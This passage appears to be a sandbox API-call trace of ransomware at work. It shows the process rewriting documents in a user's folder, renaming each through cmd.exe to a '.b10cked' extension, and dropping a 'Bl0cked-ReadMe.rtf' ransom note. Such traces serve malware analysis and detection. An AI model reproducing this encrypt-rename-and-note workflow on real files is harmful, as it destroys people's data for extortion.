0x5d7d [0233.636] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5d7a, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-23930, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5d7d [0233.636] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5d7a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gaY66uwM4.ots", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0233.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gaY66uwM4.ots", cchWideChar=13, lpMultiByteStr=0x13131ec, cbMultiByte=13, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gaY66uwM4.ots", lpUsedDefaultChar=0x0) returned 13 [0233.640] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbaf7 [0233.640] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.640] CloseHandle (hObject=0x1b4) returned 1 [0233.641] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\gaY66uwM4.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS") returned 0x2f [0233.642] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0233.642] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, 
dwProcessId=0x998, dwThreadId=0xb18)) returned 1 [0233.656] CloseHandle (hObject=0x120) returned 1 [0233.657] CloseHandle (hObject=0x1b4) returned 1 [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0233.657] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 3 [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.657] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.657] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.657] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.657] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.657] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 
[0233.657] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.657] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.657] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xaa0, dwThreadId=0x740)) returned 1 [0233.951] CloseHandle (hObject=0x120) returned 1 [0233.951] CloseHandle (hObject=0x1b4) returned 1 [0233.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0233.951] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.951] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.951] FindClose (in: hFindFile=0x1fec00 | out: 
hFindFile=0x1fec00) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Mmwj0D0mDfuQB5wXA.odp" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\mmwj0d0mdfuqb5wxa.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29074138478) returned 1 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12ed0 [0233.953] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x133b8 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x133b8 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.955] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x99db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x99db, lpOverlapped=0x0) returned 1 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.955] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x99db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x99db, lpOverlapped=0x0) returned 1 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-39387, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x99dd [0233.955] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x99db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x99db, lpOverlapped=0x0) returned 1 [0233.956] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-39387, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x99dd [0233.956] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x99db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x99db, lpOverlapped=0x0) returned 1 [0233.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mmwj0D0mDfuQB5wXA.odp", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0233.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mmwj0D0mDfuQB5wXA.odp", cchWideChar=21, lpMultiByteStr=0x1328834, cbMultiByte=21, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mmwj0D0mDfuQB5wXA.odp", lpUsedDefaultChar=0x0) returned 21 [0233.960] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x133b8 [0233.960] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.960] CloseHandle (hObject=0x1b4) returned 1 [0233.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Mmwj0D0mDfuQB5wXA.odp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP") returned 0x2f [0233.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0233.962] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"", 
lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc88, dwThreadId=0xc90)) returned 1 [0233.967] CloseHandle (hObject=0x120) returned 1 [0233.967] CloseHandle (hObject=0x1b4) returned 1 [0233.968] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.968] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.968] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 2 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\UFl3tyKJKu.ppt" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\ufl3tykjku.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29075745547) returned 1 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 